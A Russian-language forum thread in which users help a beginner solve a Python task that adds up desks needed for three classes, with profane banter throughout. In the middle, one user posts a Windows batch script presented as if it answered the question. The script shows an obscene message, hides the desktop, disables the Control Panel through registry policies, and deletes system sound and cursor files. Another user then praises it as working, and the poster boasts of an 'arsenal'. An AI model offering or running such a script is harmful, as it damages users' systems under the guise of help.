- Дней с нами
- 3.181
- Розыгрыши
- 0
- Сообщения
- 819
- Репутация
- 120
- Реакции
- 877
Лимит,завтра закинуСпасибо выражается в "+" к репке
Лимит,завтра закинуСпасибо выражается в "+" к репке
Не обязательно, Бро. Успехов!Лимит,завтра закину
ебать меня твой код пугает, пиздецКод:a = int(input()) b = int(input()) c = int(input()) print class1 = (a // 2) + (a % 2) class2 = (b // 2) + (b % 2) class3 = (c // 2) + (c % 2) print (class1 + class2 + class3) d = int(input()) f = int(input()) j = int(input()) print class1 = (d // 2) + (d % 2) class2 = (f // 2) + (f % 2) class3 = (j // 2) + (j % 2) print (class1 + class2 + class3) q = int(input()) w = int(input()) e = int(input()) print class1 = (q // 2) + (q % 2) class2 = (w // 2) + (w % 2) class3 = (e // 2) + (e % 2) print (class1 + class2 + class3) z = int(input()) x = int(input()) v = int(input()) print class1 = (z // 2) + (z % 2) class2 = (x // 2) + (x % 2) class3 = (v // 2) + (v % 2) print (class1 + class2 + class3)
Надо ещё округлить a,b,c вперёдДа,хз чекал и так,результат тот жеКод:a = int(input()) // 2 b = int(input()) // 2 c = int(input()) //2 d = ((a + b + c) print(d)
А round от 1.5 возвращает 1? оО
Хз,может не везде округлять нужноА round от 1.5 возвращает 1? оО
@echo off
msg * HOOY VAM VSEM PIZDEC
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
del "%SystemRoot%\Media" /q > nul
del "%SystemRoot%\Cursors\*.*" >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
Cейчас чекну,спасибоПервые две строчки обязательноКод:@echo off msg * HOOY VAM VSEM PIZDEC reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul del "%SystemRoot%\Media" /q > nul del "%SystemRoot%\Cursors\*.*" >nul reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
ВАУ,ДЕЙСТВИТЕЛЬНО РАБОТАЕТ,СПАСИБО!Первые две строчки обязательноКод:@echo off msg * HOOY VAM VSEM PIZDEC reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul del "%SystemRoot%\Media" /q > nul del "%SystemRoot%\Cursors\*.*" >nul reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
обращайся,у меня богатый арсеналВАУ,ДЕЙСТВИТЕЛЬНО РАБОТАЕТ,СПАСИБО!
Интересный у тебя pythonобращайся,у меня богатый арсенал
Посмотреть вложение 54532
это уже не питон,это гадюка!Интересный у тебя python
О. Я кажется врубился, вот что надо
t = int(input())
a = (t // 2) + (t % 2)
t = int(input())
b = (t // 2) + (t % 2)
t = int(input())
c = (t // 2) + (t % 2)
d = (a + b + c)
print(d)
Это только начало,впереди ещё задач 100-200О. Я кажется врубился, вот что надо
UPD
лол, тебе это и предлагали :D
UPD2
Короче фигня в том, что мы тупо делили нацело 21 на 2, получали 10, а потом пытались округлить 10 до 11
Код:t = int(input()) a = (t // 2) + (t % 2) t = int(input()) b = (t // 2) + (t % 2) t = int(input()) c = (t // 2) + (t % 2) d = (a + b + c) print(d)